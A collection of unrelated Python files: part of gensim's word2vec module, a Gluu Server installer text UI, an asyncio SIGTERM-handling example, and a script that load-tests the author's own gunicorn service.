self.source = os.path.join(self.source, '') # ensures os-specific slash at end of path
logger.info('reading directory %s', self.source)
self.input_files = os.listdir(self.source)
self.input_files = [self.source + filename for filename in self.input_files] # make full paths
self.input_files.sort() # makes sure it happens in filename order
else: # not a file or a directory, then we can't do anything with it
raise ValueError('input is neither a file nor a path')
logger.info('files read into PathLineSentences:%s', '\n'.join(self.input_files))
def __iter__(self):
"""iterate through the files"""
for file_name in self.input_files:
logger.info('reading file %s', file_name)
with utils.open(file_name, 'rb') as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i:i + self.max_sentence_length]
i += self.max_sentence_length
class Word2VecVocab(utils.SaveLoad):
"""Obsolete class retained for now as load-compatibility state capture."""
pass
class Word2VecTrainables(utils.SaveLoad):
"""Obsolete class retained for now as load-compatibility state capture."""
pass
class Heapitem(namedtuple('Heapitem', 'count, index, left, right')):
def __lt__(self, other):
return self.count < other.count
def _build_heap(wv):
heap = list(Heapitem(wv.get_vecattr(i, 'count'), i, None, None) for i in range(len(wv.index_to_key)))
heapq.heapify(heap)
for i in range(len(wv) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(
heap, Heapitem(count=min1.count + min2.count, index=i + len(wv), left=min1, right=min2)
)
return heap
def _assign_binary_codes(wv):
"""
Appends a binary code to each vocab term.
Parameters
----------
wv : KeyedVectors
A collection of word-vectors.
Sets the .code and .point attributes of each node.
Each code is a numpy.array containing 0s and 1s.
Each point is an integer.
"""
logger.info("constructing a huffman tree from %i words", len(wv))
heap = _build_heap(wv)
if not heap:
#
# TODO: how can we end up with an empty heap?
#
logger.info("built huffman tree with maximum node depth 0")
return
# recurse over the tree, assigning a binary code to each vocabulary word
max_depth = 0
stack = [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node[1] < len(wv): # node[1] = index
# leaf node => store its path from the root
k = node[1]
wv.set_vecattr(k, 'code', codes)
wv.set_vecattr(k, 'point', points)
# node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = np.array(list(points) + [node.index - len(wv)], dtype=np.uint32)
stack.append((node.left, np.array(list(codes) + [0], dtype=np.uint8), points))
stack.append((node.right, np.array(list(codes) + [1], dtype=np.uint8), points))
logger.info("built huffman tree with maximum node depth %i", max_depth)
# Example: ./word2vec.py -train data.txt -output vec.txt -size 200 -window 5 -sample 1e-4 \
# -negative 5 -hs 0 -binary 0 -cbow 1 -iter 3
if __name__ == "__main__":
import argparse
logging.basicConfig(
format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s',
level=logging.INFO
)
logger.info("running %s", " ".join(sys.argv))
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
from gensim.models.word2vec import Word2Vec # noqa:F811 avoid referencing __main__ in pickle
np.seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled;"
" default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3
)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 12)", type=int, default=12)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
else:
skipgram = 0
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
window=args.window, sample=args.sample, sg=skipgram, hs=args.hs,
negative=args.negative, cbow_mean=1, epochs=args.iter,
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
model.accuracy(args.accuracy)
logger.info("finished running %s", program)
|
tui.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import time
import random
import textwrap
import re
import socket
import curses
import string
import inspect
import threading
import math
from queue import Queue
from .messages import msg
# for putty connections we need the following env
os.environ['NCURSES_NO_UTF8_ACS'] = "1"
import npyscreen
queue = Queue()
#install types
NONE = 0
LOCAL = '1'
REMOTE = '2'
COMPLETED = -99
ERROR = -101
random_marketing_strings = [
'Having trouble? Open a ticket: https://support.gluu.org',
'Cluster your Gluu Server: https://gluu.org/docs/cm',
'oxd exposes simple, static APIs web application developers https://gluu.org/docs/oxd',
'Gluu Gateway https://gluu.org/docs/gg',
'Super Gluu (2FA) https://gluu.org/docs/supergluu',
'Gluu Casa (self-service web portal) https://gluu.org/docs/casa',
"Let's discuss your project https://www.gluu.org/booking",
'Gluu has both a social and a business mission.',
'Consider Gluu VIP Platform Subscription https://gluu.org/contact',
"Deploy Gluu using Kubernetes: https://gluu.org/docs/de",
'Evaluate our commercial offerings: https://gluu.org/pricing',
]
marketing_text_period = 20
def getClassName(c):
try:
return getattr(c, '__class__').__name__
except:
return ''
class GluuSetupApp(npyscreen.StandardApp):
installObject = None
exit_reason = str()
my_counter = 0
do_notify = True
def onStart(self):
self.addForm("MAIN", MAIN, name=msg.MAIN_label)
for obj in list(globals().items()):
if not obj[0]=='GluuSetupForm' and obj[0].endswith('Form') and inspect.isclass(obj[1]):
print("Adding form", obj[0])
self.addForm(obj[0], obj[1], name=getattr(msg, obj[0]+'_label'))
def onCleanExit(self):
if self.do_notify:
npyscreen.notify_wait("setup.py will exit in a moment. " + self.exit_reason, title="Warning!")
class GluuSetupForm(npyscreen.FormBaseNew):
def beforeEditing(self):
self.parentApp.my_counter = 0
self.add_handlers({curses.KEY_F1: self.display_help})
self.add(npyscreen.MultiLineEdit, value='=' * (self.columns - 4), max_height=1, rely=self.lines-4, editable=False)
self.marketing_label = self.add(npyscreen.MultiLineEdit, value='', max_height=1, rely=self.lines-3, editable=False)
form_name = getClassName(self)
if form_name != 'InstallStepsForm':
next_x = 20 if form_name == 'MAIN' else 28
self.button_next = self.add(npyscreen.ButtonPress, name="Next", when_pressed_function=self.nextButtonPressed, rely=self.lines-5, relx=self.columns - next_x)
if next_x == 28:
self.button_back = self.add(npyscreen.ButtonPress, name="Back", when_pressed_function=self.backButtonPressed, rely=self.lines-5, relx=self.columns - 20)
self.button_quit = self.add(npyscreen.ButtonPress, name="Quit", when_pressed_function=self.quitButtonPressed, rely=self.lines-5, relx=self.columns - 12)
if hasattr(self, 'do_beforeEditing'):
self.do_beforeEditing()
def while_waiting(self):
if self.parentApp.my_counter % marketing_text_period == 0:
self.marketing_label.value = random.choice(random_marketing_strings)
self.marketing_label.update()
self.parentApp.my_counter += 1
if hasattr(self, 'do_while_waiting'):
self.do_while_waiting()
def quitButtonPressed(self):
notify_result = npyscreen.notify_ok_cancel("Are you sure want to quit?", title= 'Warning')
if notify_result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.switchForm(None)
def display_help(self, code_of_key_pressed):
class_name = self.__class__.__name__
if hasattr(msg, class_name+'Help'):
help_text = getattr(msg, class_name+'Help')
else:
help_text = msg.no_help
npyscreen.notify_confirm(help_text, title="Help", wide=True)
class MAIN(GluuSetupForm):
def create(self):
desc_wrap = textwrap.wrap(msg.decription, self.columns - 6)
self.description_label = self.add(npyscreen.MultiLineEdit, value='\n'.join(desc_wrap), max_height=6, rely=2, editable=False)
self.description_label.autowrap = True
self.os_type = self.add(npyscreen.TitleFixedText, name=msg.os_type_label, begin_entry_at=18, value=msg.os_type + ' ' + msg.os_version, editable=False)
self.init_type = self.add(npyscreen.TitleFixedText, name=msg.init_type_label, begin_entry_at=18, value=msg.os_initdaemon, editable=False)
self.httpd_type = self.add(npyscreen.TitleFixedText, name=msg.httpd_type_label, begin_entry_at=18, value=msg.apache_version, field_width=40, editable=False)
self.license_confirm = self.add(npyscreen.Checkbox, scroll_exit=True, name=msg.acknowledge_lisence)
self.warning_text = self.add(npyscreen.MultiLineEdit, value=msg.setup_properties_warning, max_height=4, editable=False)
for sys_req in ('file_max', 'mem_size', 'number_of_cpu', 'free_disk_space'):
cur_val = getattr(msg, 'current_' + sys_req)
req_val = getattr(msg, 'suggested_' + sys_req)
if cur_val < req_val:
warning_text = getattr(msg, 'insufficient_' + sys_req).format(cur_val, req_val)
if sys_req == 'file_max':
self.parentApp.exit_reason = warning_text
self.parentApp.onCleanExit()
time.sleep(3.5)
sys.exit(False)
warning_text += '. Do you want to continue?'
result = npyscreen.notify_yes_no(warning_text, title="Warning")
if not result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.onCleanExit()
sys.exit(False)
def nextButtonPressed(self):
if not self.license_confirm.value:
npyscreen.notify_confirm(msg.acknowledge_lisence_ask, title="Info")
return
self.parentApp.switchForm("HostForm")
def on_cancel(self):
self.title.value = "Hello World!"
def resize(self):
self.button_quit.rely = self.lines-5
self.button_quit.relx = self.columns-12
self.warning_text.rely = self.columns - 8
self.button_next.rely = self.lines-5
self.button_next.relx = self.columns-20
class HostForm(GluuSetupForm):
myfields_ = ('ip', 'hostname', 'city', 'state', 'orgName', 'admin_email', 'countryCode', 'application_max_ram', 'oxtrust_admin_password')
def create(self):
self.add(npyscreen.FixedText, value=make_title(msg.cert_info_label), editable=False)
self.ip = self.add(npyscreen.TitleText, name=msg.ip_label, begin_entry_at=25)
self.hostname = self.add(npyscreen.TitleText, name=msg.hostname_label, begin_entry_at=25)
self.orgName = self.add(npyscreen.TitleText, name=msg.orgName_label, begin_entry_at=25)
self.admin_email = self.add(npyscreen.TitleText, name=msg.admin_email_label, begin_entry_at=25)
self.city = self.add(npyscreen.TitleText, name=msg.city_label, begin_entry_at=25)
self.state = self.add(npyscreen.TitleText, name=msg.state_label, begin_entry_at=25)
self.countryCode = self.add(npyscreen.TitleText, name=msg.countryCode_label, begin_entry_at=25)
self.add(npyscreen.FixedText, value=make_title(msg.sys_info_label), rely=12, editable=False)
self.application_max_ram = self.add(npyscreen.TitleText, name=msg.application_max_ram_label, begin_entry_at=25)
self.oxtrust_admin_password = self.add(npyscreen.TitleText, name=msg.oxtrust_admin_password_label, begin_entry_at=25)
def nextButtonPressed(self):
if not self.hostname.value:
npyscreen.notify_confirm(msg.enter_hostname, title="Info")
return
if self.hostname.value.lower() == 'localhost':
npyscreen.notify_confirm(msg.enter_hostname_local, title="Info")
return
if not self.parentApp.installObject.check_email(self.admin_email.value):
npyscreen.notify_confirm(msg.enter_valid_email, title="Info")
return
if not self.parentApp.installObject.isIP(self.ip.value):
npyscreen.notify_confirm(msg.enter_valid_ip, title="Info")
return
if len(self.countryCode.value) < 2:
npyscreen.notify_confirm(msg.enter_valid_countryCode, title="Info")
return
if len(self.oxtrust_admin_password.value) < 6:
npyscreen.notify_confirm(msg.oxtrust_admin_password_warning, title="Info")
return
try:
int(self.application_max_ram.value)
except:
npyscreen.notify_confirm(msg.max_ram_int_warning, title="Info")
return
for k in self.myfields_:
f = getattr(self, k)
setattr(self.parentApp.installObject, k, f.value)
self.parentApp.installObject.application_max_ram = int(self.application_max_ram.value)
self.parentApp.switchForm('ServicesForm')
def do_beforeEditing(self):
if not self.parentApp.installObject.hostname:
self.parentApp.installObject.hostname = self.parentApp.installObject.detect_hostname()
for k in self.myfields_:
f = getattr(self, k)
v = getattr(self.parentApp.installObject, k)
if v:
f.value = str(v)
f.update()
def backButtonPressed(self):
self.parentApp.switchForm('MAIN')
class ServicesForm(GluuSetupForm):
services = ('installHttpd', 'installSaml', 'installOxAuthRP',
'installPassport', 'installGluuRadius', 'installOxd',
'installCasa', 'installScimServer', 'installFido2',
)
def create(self):
for service in self.services:
cb = self.add(npyscreen.Checkbox, scroll_exit=True, name = getattr(msg, 'ask_' + service))
setattr(self, service, cb)
self.oxd_url = self.add(npyscreen.TitleText, name=msg.oxd_url_label, rely=12, begin_entry_at=17, hidden=True)
self.installCasa.value_changed_callback = self.casa_oxd_option_changed
self.installOxd.value_changed_callback = self.casa_oxd_option_changed
def do_beforeEditing(self):
for service in self.services:
if getattr(self.parentApp.installObject, service):
cb = getattr(self, service)
cb.value = True
cb.update()
def nextButtonPressed(self):
for service in self.services:
cb_val = getattr(self, service).value
setattr(self.parentApp.installObject, service, cb_val)
if self.installOxd.value:
self.parentApp.installObject.oxd_server_https = 'https://{}:8443'.format(self.parentApp.installObject.hostname)
if self.installCasa.value:
if not self.installOxd.value and not self.oxd_url.value:
npyscreen.notify_confirm(msg.install_oxd_or_url_warning, title="Warning")
return
if not self.installOxd.value:
oxd_server_https = self.oxd_url.value
oxd_connection_result = self.parentApp.installObject.check_oxd_server(oxd_server_https)
if oxd_connection_result != True:
npyscreen.notify_confirm(
msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result),
title="Warning"
)
return
oxd_hostname, oxd_port = self.parentApp.installObject.parse_url(oxd_server_https)
oxd_ssl_result = self.parentApp.installObject.check_oxd_ssl_cert(oxd_hostname, oxd_port)
if oxd_ssl_result :
npyscreen.notify_confirm(
msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname),
title="Warning")
return
self.parentApp.installObject.oxd_server_https = oxd_server_https
oxd_hostname, oxd_port = self.parentApp.installObject.parse_url(self.parentApp.installObject.oxd_server_https)
if not oxd_port:
oxd_port=8443
self.parentApp.installObject.templateRenderingDict['oxd_hostname'] = oxd_hostname
self.parentApp.installObject.templateRenderingDict['oxd_port'] = str(oxd_port)
if self.installOxd.value:
result = npyscreen.notify_yes_no(msg.ask_use_gluu_storage_oxd, title=msg.ask_use_gluu_storage_oxd_title)
if result:
self.parentApp.installObject.oxd_use_gluu_storage = True
self.parentApp.switchForm('DBBackendForm')
def casa_oxd_option_changed(self, widget):
if self.installOxd.value:
self.oxd_url.hidden = True
elif self.installCasa.value and not self.installOxd.value:
self.oxd_url.hidden = False
elif not self.installCasa.value:
self.oxd_url.hidden = True
self.oxd_url.update()
def backButtonPressed(self):
self.parentApp.switchForm('HostForm')
def make_title(text):
return '-'*10 + ' '+ text +' '+ '-'*10
class DBBackendForm(GluuSetupForm):
def create(self):
self.editw = 2
self.add(npyscreen.FixedText, value=make_title(msg.ask_wrends_install), editable=False)
self.ask_wrends = self.add(npyscreen.SelectOne, max_height=3,
values = msg.wrends_install_options, scroll_exit=True)
self.ask_wrends.value_changed_callback = self.wrends_option_changed
self.wrends_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.wrends_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.wrends_option_changed(self.ask_wrends)
self.add(npyscreen.FixedText, value=make_title(msg.ask_cb_install), rely=10, editable=False)
self.ask_cb = self.add(npyscreen.SelectOne, max_height=3,
values = msg.cb_install_options, scroll_exit=True)
self.ask_cb.value_changed_callback = self.cb_option_changed
self.cb_admin = self.add(npyscreen.TitleText, name=msg.username_label)
self.cb_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.cb_option_changed(self.ask_cb)
def do_beforeEditing(self):
self.ask_wrends.value = [int(self.parentApp.installObject.wrends_install)]
if self.parentApp.installObject.wrends_install == REMOTE:
self.wrends_hosts.hidden = False
else:
self.wrends_hosts.hidden = True
if not self.parentApp.installObject.wrends_install:
self.wrends_password.hidden = True
else:
self.wrends_password.hidden = False
if self.parentApp.installObject.wrends_install == LOCAL:
if not self.parentApp.installObject.ldapPass:
self.wrends_password.value = self.parentApp.installObject.oxtrust_admin_password
self.wrends_hosts.value = self.parentApp.installObject.ldap_hostname
self.ask_cb.value = [int(self.parentApp.installObject.cb_install)]
if not self.parentApp.installObject.cb_install:
self.cb_admin.hidden = True
else:
self.cb_admin.hidden = False
if self.parentApp.installObject.cb_install == REMOTE:
self.cb_hosts.hidden = False
else:
self.cb_hosts.hidden = True
if not self.parentApp.installObject.cb_install:
self.cb_password.hidden = True
else:
self.cb_password.hidden = False
if self.parentApp.installObject.cb_install == LOCAL:
if not self.parentApp.installObject.cb_password:
self.cb_password.value = self.parentApp.installObject.oxtrust_admin_password
self.cb_hosts.value = self.parentApp.installObject.couchbase_hostname
self.cb_admin.value = self.parentApp.installObject.couchebaseClusterAdmin
self.wrends_hosts.update()
self.ask_wrends.update()
self.wrends_hosts.update()
self.wrends_password.update()
self.cb_hosts.update()
self.ask_cb.update()
self.cb_hosts.update()
self.cb_password.update()
def nextButtonPressed(self):
msg.backend_types = []
self.parentApp.installObject.wrends_install = str(self.ask_wrends.value[0]) if self.ask_wrends.value[0] else 0
if self.parentApp.installObject.wrends_install == LOCAL:
self.parentApp.installObject.ldap_hostname = 'localhost'
self.parentApp.installObject.ldapPass = self.wrends_password.value
elif self.parentApp.installObject.wrends_install == REMOTE:
self.parentApp.installObject.ldap_hostname = self.wrends_hosts.value
self.parentApp.installObject.ldapPass = self.wrends_password.value
result = self.parentApp.installObject.check_remote_ldap(
self.wrends_hosts.value,
self.parentApp.installObject.ldap_binddn,
self.wrends_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.installObject.cb_install = str(self.ask_cb.value[0]) if self.ask_cb.value[0] else 0
if self.parentApp.installObject.cb_install == LOCAL:
self.parentApp.installObject.couchbase_hostname = 'localhost'
self.parentApp.installObject.cb_password = self.cb_password.value
elif self.parentApp.installObject.cb_install == REMOTE:
self.parentApp.installObject.couchbase_hostname = self.cb_hosts.value
self.parentApp.installObject.couchebaseClusterAdmin = self.cb_admin.value
self.parentApp.installObject.cb_password = self.cb_password.value
result = self.parentApp.installObject.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
if self.parentApp.installObject.cb_install:
self.parentApp.installObject.cache_provider_type = 'NATIVE_PERSISTENCE'
self.parentApp.installObject.add_couchbase_post_messages()
if self.parentApp.installObject.wrends_install and not self.parentApp.installObject.checkPassword(self.parentApp.installObject.ldapPass):
npyscreen.notify_confirm(msg.weak_password.format('WrenDS'), title="Warning")
return
if self.parentApp.installObject.cb_install and not self.parentApp.installObject.checkPassword(self.parentApp.installObject.cb_password):
npyscreen.notify_confirm(msg.weak_password.format('Couchbase Server'), title="Warning")
return
if self.parentApp.installObject.wrends_install or self.parentApp.installObject.cb_install:
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
self.parentApp.installObject.persistence_type = 'hybrid'
self.parentApp.switchForm('StorageSelectionForm')
else:
storage_list = list(self.parentApp.installObject.couchbaseBucketDict.keys())
storage = 'ldap'
if self.parentApp.installObject.cb_install:
storage = 'couchbase'
for s in storage_list:
self.parentApp.installObject.mappingLocations[s] = storage
self.parentApp.installObject.persistence_type = storage
self.parentApp.switchForm('DisplaySummaryForm')
else:
npyscreen.notify_confirm(msg.notify_select_backend, title="Warning")
return
def wrends_option_changed(self, widget):
if self.ask_wrends.value:
if not self.ask_wrends.value[0]:
self.wrends_password.hidden = True
self.wrends_hosts.hidden = True
elif str(self.ask_wrends.value[0]) == LOCAL:
self.wrends_password.hidden = False
self.wrends_hosts.hidden = True
elif str(self.ask_wrends.value[0]) == REMOTE:
self.wrends_password.hidden = False
self.wrends_hosts.hidden = False
self.wrends_password.update()
self.wrends_hosts.update()
def cb_option_changed(self, widget):
if self.ask_cb.value:
if not self.ask_cb.value[0]:
self.cb_admin.hidden = True
self.cb_password.hidden = True
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == LOCAL:
self.cb_admin.hidden = False
self.cb_hosts.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == REMOTE:
self.cb_admin.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = False
self.cb_admin.update()
self.cb_password.update()
self.cb_hosts.update()
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
class StorageSelectionForm(GluuSetupForm):
def create(self):
self.wrends_storage = self.add(npyscreen.TitleMultiSelect, begin_entry_at=25, max_height=len(msg.storages),
values=msg.storages, name=msg.DBBackendForm_label, scroll_exit=True)
self.add(npyscreen.FixedText, value=msg.unselected_storages, rely=len(msg.storages)+4, editable=False, color='STANDOUT')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
def do_beforeEditing(self):
self.wrends_storage.values = list(self.parentApp.installObject.couchbaseBucketDict.keys())
value = []
for i, s in enumerate(self.parentApp.installObject.couchbaseBucketDict.keys()):
if self.parentApp.installObject.mappingLocations[s] == 'ldap':
value.append(i)
self.wrends_storage.value = value
self.wrends_storage.update()
def nextButtonPressed(self):
storage_list = list(self.parentApp.installObject.couchbaseBucketDict.keys())
for i, s in enumerate(storage_list):
if i in self.wrends_storage.value:
self.parentApp.installObject.mappingLocations[s] = 'ldap'
else:
self.parentApp.installObject.mappingLocations[s] = 'couchbase'
self.parentApp.switchForm('DisplaySummaryForm')
class DisplaySummaryForm(GluuSetupForm):
myfields_1 = ("hostname", "orgName", "os_type", "city", "state", "countryCode",
"application_max_ram")
myfields_2 = ( "installOxAuth", "installOxTrust",
"installHttpd", "installSaml", "installOxAuthRP",
"installPassport", "installGluuRadius",
"installOxd", "installCasa",
'installScimServer', 'installFido2',
"java_type",
"backend_types", 'wrends_storages')
def create(self):
for i, wn in enumerate(self.myfields_1):
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=24,
editable=False,
)
)
sec_col_n = math.ceil(len(self.myfields_2)/2.0)
for j, wn in enumerate(self.myfields_2):
if j < sec_col_n:
relx=2
rely = i+4+j
else:
relx=39
rely = i+4+j-sec_col_n
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=20,
editable=False,
rely=rely,
relx=relx,
)
)
def do_beforeEditing(self):
wrends_storages_widget = getattr(self, 'wrends_storages')
for wn in self.myfields_1+self.myfields_2:
w = getattr(self, wn)
if getClassName(w) == 'TitleFixedText':
if wn == 'backend_types':
bt_ = []
if self.parentApp.installObject.wrends_install == LOCAL:
bt_.append('wrends')
elif self.parentApp.installObject.wrends_install == REMOTE:
bt_.append('wrends[R]')
if self.parentApp.installObject.cb_install == LOCAL:
bt_.append('couchbase')
elif self.parentApp.installObject.cb_install == REMOTE:
bt_.append('couchbase[R]')
w.value = ', '.join(bt_)
elif wn == 'wrends_storages':
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
wds_ = []
for k in self.parentApp.installObject.mappingLocations:
if self.parentApp.installObject.mappingLocations[k] == 'ldap':
wds_.append(k)
w.hidden = False
w.value = ', '.join(wds_)
else:
w.hidden = True
else:
val = getattr(self.parentApp.installObject, wn)
w.value = str(val)
w.update()
def backButtonPressed(self):
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
self.parentApp.switchForm('StorageSelectionForm')
else:
self.parentApp.switchForm('DBBackendForm')
def nextButtonPressed(self):
# Validate Properties
self.parentApp.installObject.check_properties()
self.parentApp.switchForm('InstallStepsForm')
class InputBox(npyscreen.BoxTitle):
_contained_widget = npyscreen.MultiLineEdit
class InstallStepsForm(GluuSetupForm):
desc_value = None
def create(self):
self.prgress_percantage = self.add(npyscreen.TitleSliderPercent, accuracy=0, out_of=msg.installation_step_number+1, rely=4, editable=False, name="Progress")
self.installing = self.add(npyscreen.TitleFixedText, name=msg.installing_label, value="", editable=False)
self.description = self.add(InputBox, name="", max_height=6, rely=8)
def do_beforeEditing(self):
t=threading.Thread(target=self.parentApp.installObject.do_installation, args=(queue,))
t.daemon = True
t.start()
def do_while_waiting(self):
if not queue.empty():
data = queue.get()
if data[0] == COMPLETED:
if self.parentApp.installObject.post_messages:
npyscreen.notify_confirm('\n'.join(self.parentApp.installObject.post_messages), title="Post Install Messages", wide=True)
npyscreen.notify_confirm(msg.installation_completed.format(self.parentApp.installObject.hostname), title="Completed")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
elif data[0] == ERROR:
npyscreen.notify_confirm(msg.installation_error +"\n"+data[2], title="ERROR")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
self.prgress_percantage.value = data[0]
self.prgress_percantage.update()
self.installing.value = data[2]
self.installing.update()
if self.desc_value != data[1]:
if hasattr(msg, 'installation_description_' + data[1]):
desc = getattr(msg, 'installation_description_' + data[1])
else:
desc = msg.installation_description_gluu
self.description.value = '\n'.join(textwrap.wrap(desc, self.columns - 10))
self.description.update()
self.desc_value = data[1]
def backButtonPressed(self):
pass
def nextButtonPressed(self):
pass
|
asyncfin-v1.py
|
"""
Correct tasks finalization. Variant 1. Do it by SIGTERM interception.
"""
import asyncio
import multiprocessing
import random
import signal
import time
class Client(object):
def __init__(self):
self.running = True
@asyncio.coroutine
async def test(self, i):
while self.running:
val = random.randint(0, 4)
print ("Do work. thread: {0}, timeout: {1}".format(i, val))
await asyncio.sleep(val)
print ("End of thread: {0}".format(i))
async def waiter(self):
tasks = [t for t in asyncio.Task.all_tasks() if t is not asyncio.Task.current_task()]
await asyncio.gather(*tasks)
self.loop.remove_signal_handler(signal.SIGTERM)
self.loop.stop()
def sigterm_handler(self):
print("Catch SIGTERM")
self.running = False
self.loop.create_task(self.waiter())
def run(self):
self.loop = asyncio.get_event_loop()
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm_handler)
for j in range(3):
self.loop.create_task(self.test(j))
try:
self.loop.run_forever()
finally:
print("Finally section")
self.loop.close()
def bgrun(self):
evloop_process = multiprocessing.Process(target=self.run, args=())
evloop_process.start()
time.sleep(4)
evloop_process.terminate()
evloop_process.join()
client = Client();
client.bgrun();
|
comparison-request-gunicorn-dynamic.py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import threading
from queue import Queue
import requests
# In[2]:
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [threading.Thread(target=task_wrapper, args=args) for args in args_list]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def get_time(text, type_api, i):
response = str(requests.get("http://192.168.0.102:8033/%s?text=%s" % (type_api, text)).content)
return [response, i]
# # Stress test 50 requests concurrently on dynamic graph, when worker = 1
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 1
# ```
# In[10]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 2
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 2
# ```
# In[12]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 5
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 5
# ```
# In[13]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 7
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 7
# ```
# In[14]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# # Stress test 50 requests concurrently on dynamic graph, when worker = 10
# #### Please run,
#
# ```bash
# bash run-gunicorn-dynamic.sh 10
# ```
# In[15]:
CONCURRENT = 50
threads = []
for i in range(CONCURRENT):
threads.append(("Freeze model loaded more faster than dynamic model", "dynamic", i))
outputs = run_parallel_in_threads(get_time, threads)
total = 0
for i in outputs:
total += float(i[0][2:-1])
print("thread %d, time taken %f s" % (i[1], float(i[0][2:-1])))
print("total time taken %f s, average time taken %f s" % (total, total / CONCURRENT))
# In[ ]:
|
6.py
|
